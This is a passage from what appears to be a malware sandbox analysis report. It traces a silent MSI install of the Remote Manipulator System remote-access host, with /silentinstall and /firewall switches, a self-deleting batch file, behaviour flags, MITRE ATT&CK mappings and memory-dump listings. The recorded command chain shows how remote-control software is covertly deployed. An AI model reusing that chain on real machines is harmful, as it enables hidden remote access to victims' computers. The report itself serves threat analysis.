      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\killself.bat
      4⤵
      PID:1360

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:440

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F364BD36C0883B21D73DBA3BFA659B77
  2⤵
  - Loads dropped DLL
  PID:2144
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:308
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3168
- C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1064

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
"C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1124
- C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
  2⤵
  - Executes dropped EXE
  PID:2176
- C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
  "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2520
- - C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
    "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:2168

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:3460

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/308-161-0x0000000002680000-0x0000000002681000-memory.dmp

Filesize
4KB

Download
memory/440-127-0x00000213CBF90000-0x00000213CBF92000-memory.dmp

Filesize
8KB

Download
memory/440-128-0x00000213CBF90000-0x00000213CBF92000-memory.dmp

Filesize
8KB

Download
memory/1064-169-0x0000000000B40000-0x0000000000B41000-memory.dmp

Filesize
4KB

Download
memory/1124-170-0x00000000001D0000-0x00000000001F3000-memory.dmp

Filesize
140KB

Download
memory/1320-148-0x0000000000E00000-0x0000000000E01000-memory.dmp

Filesize
4KB

Download
memory/1320-147-0x0000000000E00000-0x0000000000E01000-memory.dmp

Filesize
4KB

Download
memory/1940-145-0x0000000000B00000-0x0000000000B01000-memory.dmp

Filesize
4KB

Download
memory/2144-154-0x0000000000470000-0x0000000000471000-memory.dmp

Filesize
4KB

Download
memory/2144-155-0x0000000000470000-0x0000000000471000-memory.dmp

Filesize
4KB

Download
memory/2168-190-0x0000000000B20000-0x0000000000B21000-memory.dmp

Filesize
4KB

Download
memory/2176-186-0x0000000002700000-0x0000000002701000-memory.dmp

Filesize
4KB

Download
memory/2280-126-0x0000000000930000-0x0000000000932000-memory.dmp

Filesize
8KB

Download
memory/2520-187-0x00000000025C0000-0x00000000025C1000-memory.dmp

Filesize
4KB

Download
memory/2616-151-0x000002561C240000-0x000002561C242000-memory.dmp

Filesize
8KB

Download
memory/2616-152-0x000002561C240000-0x000002561C242000-memory.dmp

Filesize
8KB

Download
memory/3160-116-0x00007FFE21F40000-0x00007FFE22A9D000-memory.dmp

Filesize
11.4MB

Download
memory/3160-138-0x0000000002846000-0x0000000002848000-memory.dmp

Filesize
8KB

Download
memory/3160-115-0x0000000002840000-0x0000000002842000-memory.dmp

Filesize
8KB

Download
memory/3168-168-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download